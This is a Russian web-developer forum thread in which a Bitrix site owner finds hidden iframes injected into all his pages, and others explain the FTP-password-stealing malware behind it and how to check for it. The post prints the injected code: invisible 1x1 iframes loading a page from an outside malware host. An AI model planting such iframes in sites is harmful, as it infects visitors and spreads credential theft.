Добро пожаловать на сайт <БагБД>, где вы можете задавать вопросы о программировании и разработке на Битрикс и Битрикс24, и получать быстрые и квалифицированные ответы от профессионалов!

Проблемы с безопасностью сайта на битриксе

00 голосов
6
Сегодня с утра обнаружил очень странную вещь. Началось все с того, что позвонил партнер и пожаловался на то, что наш сайт не грузится. Смотрю у себя в файрфоксе - все замечательно работает и я уже мысленно посылаю "тупого идиота с кривыми руками". Однако у меня появилось сомнение - я загружаю эксплорер и вуаля - пустой экран. Код страницы:
Код
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1251"></HEAD>
<BODY></BODY></HTML>


Пытался разобраться минут 15, отключил все жава скрипты, счетчики - вообще, все что можно было бы отрубить. И тут случайно натыкаюсь в индексном файле, в самом конце вставлен код:

Код
<!-- ~ --><iframe src='http://takesnames.info/st/go.php?sid=' width=1 height=1 style='visibility: hidden;'></iframe>

<iframe src='http://takesnames.info/st/go.php?sid=1' width=1 height=1 style='visibility: hidden;'></iframe>

<iframe src='http://takesnames.info/st/go.php?sid=2' width=1 height=1 style='visibility: hidden;'></iframe>

<iframe src='http://takesnames.info/st/go.php?sid=3' width=1 height=1 style='visibility: hidden;'></iframe><!-- ~ -->


откуда он взялся - не знаю, сисадмин тоже не знает.

Поправил рутовый индексник - индексная страница заработала. Начал лазить по сайту - все остальные страницы заражены этим же кодом. Не знаю сколько раз я выразился матом, пока исправлял все это, но приличные слова я подобрать не могу.

Существуют ли какие-то проблемы с уязвимостью битрикса? Может какая-нибудь дыра открыта? Сам битрикс обновлен до последней версии, "новые обновления ядра недоступны".

урл сайта - ISS
спросил 24 Окт, 13 от 00700796 (120 баллов)

6 Ответы

00 голосов
Цитата Дмитрия Вальянова из закрытого форума:

Цитата

Коллеги,

За последние несколько дней участилось число сообщений о заражении сайтов построенных на различных платформах.

На форуме сайта virusinfo.info обсуждают проблему касательно сайтов, построенных на базе Joomla.
Здесь же вы найдете комментарии администраторов хостинга по возможным причинам заражения вирусом.
http://virusinfo.info/showthread.php?t=9701&page=2­

Проблема между тем касается многих сайтов.
Случаи массового заражения сайтов на хостингах нередки.
Не далее как полгода назад был случай массового заражения сайтов на Valuehost, тогда пострадали 470 ресурсов:
http://itua.info/news/security/6990.html

Совсем недавно с предупреждением выступил и другой хостер:
http://www.gold-host.ru/viewtopic.php?p=143

Суть проблемы в том, что в код определенных страниц на сайтах размещается скрипт, который встраивает iframe с подключаением к удаленному сайту, распространяющему вирус.

После загрузки с сайта и установки в систему, вирус проверяет доступные пароли к FTP серверам и пытается инфицировать файлы на них.

Таки образом, подцепив заразу, можно поставить под угрозу массу сайтов, к которым у вас есть доступ по FTP.

Восклицание Пожалуйста, внимательно ознакомьтесь с приведенными выше ссылками!

Могу посоветовать использовать антивирус Avast!, он четко среагировал при подключении к странице, содержащей вредоносный код.

Для того чтобы всегда знать, были ли модифицированы файлы на сервере можно использовать встроенный в продукт механизм "Контроля файлов".
( см. http://www.bitrix.ru/learning/course/...D=6&ID=270­ )

Пожалуйста сообщайте нам в техподдержку, в случае, если вы столкнетесь в своей работе с какими-либо проявлениями подобных вирусов.
ответил 20 Ноя, 13 от salo (840 баллов)
00 голосов
ахренеть, дайте две.........я в шоке smile:o

спасибо за оперативный ответ
ответил 28 Фев, 14 от 00700796 (120 баллов)
00 голосов
Эта проблема уже поднималась в форуме
http://www.bitrixsoft.ru/support/forum/forum7/topic6813/message40793/
ответил 20 Июнь, 14 от Alverdine (500 баллов)
00 голосов
Цитата
Василий Умнов пишет:
я в шоке


Василий,

проверяйте на вирус свой компьютер и компьютер администраторов, у которых есть вход на FTP.

По информации других источников - пароли вычитываются вирусом из Total Commander.
ответил 19 Окт, 14 от Shadow (820 баллов)
00 голосов
Цитата
Dmitry Valyanov пишет:
пароли вычитываются вирусом из Total Commander

Слава Богу, не пользуемся им smile;-)
ответил 18 Фев, 15 от Grow (340 баллов)
00 голосов
Цитата
Василий,

проверяйте на вирус свой компьютер и компьютер администраторов, у которых есть вход на FTP.

По информации других источников - пароли вычитываются вирусом из Total Commander.


Тотал коммандером не пользуюсь......стоит Cute FTP и FAR.

Сейчас идет принудительное сканирование всех дисков на вирусы.
ответил 29 Май, 15 от 00700796 (120 баллов)

Похожие вопросы

0 голосов
5 ответов
0 голосов
10 ответов
спросил 25 Янв, 13 от RAKSE (240 баллов)
0 голосов
4 ответов
0 голосов
1 ответ
+1 голос
7 ответов